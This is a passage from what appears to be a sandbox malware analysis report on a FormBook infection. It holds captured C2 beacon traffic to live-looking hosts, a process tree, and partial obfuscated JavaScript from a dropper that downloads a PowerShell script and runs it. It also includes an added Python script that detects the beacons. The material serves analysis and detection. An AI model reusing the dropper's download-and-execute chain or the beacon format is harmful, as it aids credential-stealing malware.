                                                                        Data Raw: 4a 5a 66 64 3d 36 43 31 75 65 4b 39 78 4f 36 34 31 53 62 38 57 50 6b 47 70 6e 70 45 79 35 50 6d 65 72 57 6a 69 57 57 47 33 63 67 76 31 39 4a 6b 54 6c 48 6f 37 41 67 61 4a 65 6e 43 73 53 63 49 4f 6c 31 74 4d 58 4c 79 74 50 32 73 65 6d 76 39 56 7a 46 65 6b 4b 6a 7a 38 4c 45 67 7a 46 4d 49 49 41 6f 43 72 44 36 70 5a 65 2b 48 59 77 33 52 6c 61 6d 7a 70 38 33 44 42 48 70 33 4d 6b 78 2b 6d 39 4d 73 72 69 77 33 48 68 74 6b 74 65 44 64 56 61 71 77 42 57 7a 57 31 78 6f 63 41 4b 6e 33 77 74 74 4f 4a 78 30 56 71 4f 54 62 62 33 4f 65 71 64 37 58 5a 4f 64 4e 31 62 53 37 39 76 4a 77 6c 4f 50 4b 57 75 43 30 75 42 6d 69 59 30 46 2b 59 49 58 4a 66 54 69 45 44 42 59 6a 6b 76 7a 38 42 4e 70 67 68 47 38 32 79 67 65 34 43 68 62 53 34 68 42 6d 73 79 73 38 65 56 53 4b 6a 48 50 65 38 6c 59 4d 36 56 30 30 52 59 4d 61 35 55 34 74 59 31 46 50 4e 6c 5a 49 62 56 32 4f 49 70 73 36 67 74 36 35 72 39 6f 4e 57 44 37 7a 4f 73 36 33 49 73 6e 39 39 48 51 42 44 4a 57 6e 55 66 6b 31 2f 63 4a 6b 72 50 6a 4e 4e 55 79 65 6f 6a 36 66 6e 66 [TRUNCATED]
                                                                        Data Ascii: JZfd=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 [TRUNCATED]


                                                                        Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 52667 | Destination IP: 47.83.1.90 | Destination Port: 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:16:27.642092943 CET | 566 | OUT | GET /xqy6/?JZfd=3AdOd/JiBJZfW59JF3bk/JUX+I6ir2eDUVeNMTHa5bokm3l1PR6gBk+gEKdbuXFpEa+iNwYC+tVHkUu9Fw3QKE4rVdEfXJGpPPZQf/r11XdvYWfnyknaUqI=&28t=_DlH9FNpJbu HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Host: www.dqvcbn.info
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Feb 18, 2025 08:16:29.218359947 CET | 139 | IN | HTTP/1.1 567 unknown
                                                                        Server: nginx/1.18.0
                                                                        Date: Tue, 18 Feb 2025 07:16:29 GMT
                                                                        Content-Length: 17
                                                                        Connection: close
                                                                        Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                        Data Ascii: Request too large

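Every request the injected process sends above has the same shape regardless of host: the fixed MSIE 8.0 User-Agent, a short lowercase directory as the path (/mvfs/, /xqy6/), Origin and Referer built from Host plus that path, a single short-named form field (JZfd) carrying an opaque base64 blob in POST bodies and GET query strings, and Connection: close. The hostname is the weak part of the indicator (two of the three hosts answered 405 or "Request too large"), so a detector should score the structure rather than the domain. The following Python script is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses raw HTTP requests and counts these traits. The two malicious samples are rebuilt from the captured headers and bodies above (the first POST to www.weilaishijie.xyz and the GET of session 17); the benign www.example.com request and the alert threshold of three traits are assumptions for illustration.

```python
"""Score raw HTTP requests for the FormBook beacon shape captured above.

Added example, not part of the Joe Sandbox report. Sample requests are
rebuilt from the captured sessions; the benign request and the alert
threshold are assumptions.
"""
import re

# Exact User-Agent sent in every captured request of this report.
FORMBOOK_UA = (
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; "
    "SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; "
    ".NET CLR 3.0.30618; .NET4.0C; BRI/1)"
)
# Observed C2 paths: /mvfs/ and /xqy6/ (assumption: short lowercase alnum directory).
C2_PATH_RE = re.compile(r"^/[a-z0-9]{2,6}/$")
# One short alphanumeric field name carrying an opaque blob, e.g. JZfd=<base64>.
PARAM_RE = re.compile(r"^([A-Za-z0-9]{2,8})=([A-Za-z0-9+/=]+)$")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def looks_base64(value):
    """Alphabet, padding and length check only; the blob is encrypted, decoding would not help."""
    return len(value) >= 16 and len(value) % 4 == 0 and B64_RE.fullmatch(value) is not None


def score_request(raw):
    """Return (score, reasons): one point per FormBook-like trait present."""
    method, target, h, body = parse_request(raw)
    path, _, query = target.partition("?")
    host = h.get("host", "")
    reasons = []
    if h.get("user-agent") == FORMBOOK_UA:
        reasons.append("exact FormBook IE8 User-Agent")
    if C2_PATH_RE.match(path):
        reasons.append("short C2-style path " + path)
    # Origin and Referer are synthesized from Host + path, not copied from a real page.
    if h.get("origin") == "http://" + host and h.get("referer") == "http://" + host + path:
        reasons.append("Origin/Referer derived from Host+path")
    if method == "POST" and h.get("content-type") == "application/x-www-form-urlencoded":
        m = PARAM_RE.match(body.strip())
        if m and looks_base64(m.group(2)):
            reasons.append("single form field %s carrying a base64 blob" % m.group(1))
    elif method == "GET" and query:
        for kv in query.split("&"):  # e.g. 28t=_DlH9FNpJbu&JZfd=<base64>
            m = PARAM_RE.match(kv)
            if m and looks_base64(m.group(2)):
                reasons.append("query field %s carrying a base64 blob" % m.group(1))
                break
    if h.get("connection") == "close" and h.get("cache-control") == "max-age=0":
        reasons.append("Connection: close with Cache-Control: max-age=0")
    return len(reasons), reasons


def is_formbook_beacon(raw, threshold=3):
    """Assumed threshold: three independent traits. Tune against your own traffic."""
    return score_request(raw)[0] >= threshold


# Rebuilt from the first captured POST to www.weilaishijie.xyz (221-byte form body).
SAMPLE_POST = (
    "POST /mvfs/ HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Accept-Language: en-us\r\n"
    "Host: www.weilaishijie.xyz\r\n"
    "Origin: http://www.weilaishijie.xyz\r\n"
    "Referer: http://www.weilaishijie.xyz/mvfs/\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 221\r\n"
    "Connection: close\r\n"
    "Cache-Control: max-age=0\r\n"
    f"User-Agent: {FORMBOOK_UA}\r\n"
    "\r\n"
    "JZfd=DVW3Fw1tLhqyvw6+j0MJewGa2xOLtRNbz+8E0f6T29BiIpZwGZI8UwVWSiolyPvTiAs0dHElCbI66bfCZVyMfOpYSOc/GEScKl7d3h3LAUf1GsU2RoICd+9F/ho8l63tMDyCcrGxMnDo5dTnRBiwolL0e+shhggvuCS5VWYKBc1XJXr1jmdWildsR/hpiBecGmaQ/Ai7kvP9ZINvWeqzdxM="
)
# Rebuilt from session 17 (GET beacon with the blob in the query string).
SAMPLE_GET = (
    "GET /mvfs/?28t=_DlH9FNpJbu&JZfd=OX+XGG1vMjnBpir6rX0/G3mm6BKDnX5s9v0C7sC38KVwA5xuSoQxQAVtGC05vfCZlgARXwgyCJM/mKbUQVyNeO12dcoATF+wDwavyiCFDGb9TNEZS4YCLPo= HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\n"
    "Accept-Language: en-us\r\n"
    "Host: www.weilaishijie.xyz\r\n"
    "Connection: close\r\n"
    f"User-Agent: {FORMBOOK_UA}\r\n"
    "\r\n"
)
# Constructed benign request for comparison (www.example.com is a placeholder).
SAMPLE_BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0\r\n"
    "Accept: */*\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, req in (("POST", SAMPLE_POST), ("GET", SAMPLE_GET), ("benign", SAMPLE_BENIGN)):
        score, reasons = score_request(req)
        print(name, score, is_formbook_beacon(req), reasons)
```

The User-Agent on its own is a poor indicator (any software emulating an old IE 8 on Vista produces it), which is why the script only reports a hit when several traits coincide; the POST beacon above scores all five, the GET beacon three, the benign request none.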


                                                                        Target ID:0
                                                                        Start time:02:14:11
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js"
                                                                        Imagebase:0x7ff619230000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:02:14:24
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:02:14:24
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:02:14:26
                                                                        Start date:18/02/2025
                                                                        Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                        Imagebase:0x10000
                                                                        File size:413'184 bytes
                                                                        MD5 hash:FEC299680E47D0901C60D84DD11EFC55
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:02:14:26
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                        Imagebase:0x80000
                                                                        File size:65'440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:02:14:26
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                        Imagebase:0x980000
                                                                        File size:65'440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2104088509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2106523345.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2110867358.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:02:14:44
                                                                        Start date:18/02/2025
                                                                        Path:C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\tlGuABffGV7.exe"
                                                                        Imagebase:0x3f0000
                                                                        File size:143'872 bytes
                                                                        MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2989939402.0000000003060000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Target ID:10
                                                                        Start time:02:14:46
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\SysWOW64\MRINFO.EXE
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\MRINFO.EXE"
                                                                        Imagebase:0x710000
                                                                        File size:14'336 bytes
                                                                        MD5 hash:F664A3E4625D86FC6B389AFF416CF67F
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2989897397.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2989992903.0000000003550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2987628096.0000000003050000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Target ID:11
                                                                        Start time:02:14:59
                                                                        Start date:18/02/2025
                                                                        Path:C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\VhI7TkPM.exe"
                                                                        Imagebase:0x3f0000
                                                                        File size:143'872 bytes
                                                                        MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2992102247.0000000005150000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Target ID:12
                                                                        Start time:02:15:13
                                                                        Start date:18/02/2025
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff6bf500000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Call Graph

                                                                        Call graph (rendered graph not preserved; nodes and edges recovered from the graph data): entry → _0x429836, _0x165511, CreateObject, _0x36bb1e, DownloadScript, LogError, RunPowerShellScript; DownloadScript → _0x5e2485, _0x5b10a7, _0x43684b, Close, LogError; LogError → _0x5c2acd; RunPowerShellScript → LogError, _0xe1c1e0, _0x42f115; the string decoders _0xe32f, _0x2aa5 and _0x5598 each call _0x3d8f and themselves, and their helpers use charAt, fromCharCode, indexOf, slice, toString, charCodeAt and decodeURIComponent.

                                                                        Script:

                                                                        Code
                                                                        var _0x36bb1e = _0x5598, _0x165511 = _0x2aa5, _0x429836 = _0xe32f;
                                                                          function _0x3d8f() {
                                                                          • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
                                                                          var _0x1bc8c2 = [ 'MSXML2.XMLHTTP', '371190cReolU', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU', 'q3jLyxrLt2jQzwn0', 'bab4W6tdK8oJrG', 'W4iJW43dGGa8W5i7W40iWOVcRq4', 'message', '12642224tnuDGo', 'Quit', 'rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia', '124678FeSFCc', 'WQ7dVXVcVCkpCLJcM8keW6W', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW', 'WRTMW6pdJa', 'otCXnJC0ng50B2XSrq', 'WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa', 'W5eDD8oh', 'W4uIW4NdJfvKWO8CW7yO', '5836fimqHT', 'CreateTextFile', 'PowerShell\x20-NoProfile\x20-ExecutionPolicy\x20RemoteSigned\x20-File\x20', 'rM9SzgvYrxHPC3rZ', 'Download\x20failed\x20with\x20status:\x20', 'nte0mtu4nxrtrejRyG', 'jaK5Emo3iSkUAW', 'W4VdKZ5ZrG', 'WQ0zW5eBW5/cR8oIyHpcSa', 'u3rHDhvZ', 'GET', '9MuWyMs', 'WQhdRvRdTW', 'Run', 'nZDxAenPu0e', 'CreateFolder', 'WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0', 'C:\x5cTemp\x5cdddddd.ps1', 'mZCXmtKWy1jLB2Xv', 'mti2ndiYmJr0BNver28' ];
                                                                            _0x3d8f =
                                                                              function () {
                                                                              • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
                                                                              • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
                                                                              • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
                                                                              • _0x3d8f() ➔ 371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP
                                                                              • _0x3d8f() ➔ rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU
                                                                              • _0x3d8f() ➔ q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU
                                                                              • _0x3d8f() ➔ bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0
